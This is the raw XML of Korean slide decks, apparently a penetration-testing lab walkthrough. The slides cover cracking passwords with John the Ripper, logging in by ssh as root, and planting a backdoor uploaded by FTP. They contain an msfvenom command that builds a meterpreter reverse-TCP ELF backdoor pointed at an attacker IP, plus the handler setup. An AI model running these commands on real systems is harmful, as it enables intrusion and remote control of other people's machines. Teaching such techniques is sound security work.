            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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C598A25E-1F4E-4D9B-9EB5-F57F32CC47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808" y="3308811"/>
            <a:ext cx="5925351" cy="3208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7036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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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패스워드 복호화가 시작되고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아래단에 현재 복호화 상태를 보여준다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복호화가 완료된 항목은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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passwor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단에 추가된다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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9E1E42E6-9863-4C96-9056-7FD2E36DB1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991" y="3268416"/>
            <a:ext cx="6113809" cy="3310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0755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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A34401-599B-45B7-85F2-254DBEDFA9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="사각형: 둥근 위쪽 모서리 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="5460990"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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7" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B6E55-904B-464D-918A-13440A5DEE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3531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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마무리</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883ECC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79568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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115343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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>침투 준비</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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ko-KR" altLang="en-US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백도어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파일 제작</a:t>
            </a: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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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백도어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파일을 통해 접속</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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85800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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>마무리</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F497BAFF-A3AA-4C33-B9B4-00AC67500DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5913238" cy="4686300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85800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>@@@ Kali @@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>msfvenom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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> –p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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>linux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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/x86/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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>meterpreter_reverse_tcp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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lhost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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=[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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>공격자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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ip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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>]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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lport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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=[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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>공격자포트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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>] –f elf &gt;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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>backdoor.elf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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>msfconsole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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># set payload php/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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>meterpreter_reverse_tcp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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># set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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lhost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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> [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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>공격자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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># set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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lport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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> [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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>공격자 포트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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># exploit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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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944647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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>침투</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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알아낸 패스워드로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root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접속</a:t>
            </a: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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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85800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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>마무리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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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73F5166A-1259-4210-AA21-A1EADA7A31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691" y="1825170"/>
            <a:ext cx="6008872" cy="1861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15666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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2. Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>설치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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Ftp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로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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백도어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파일 업로드</a:t>
            </a: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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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85800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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
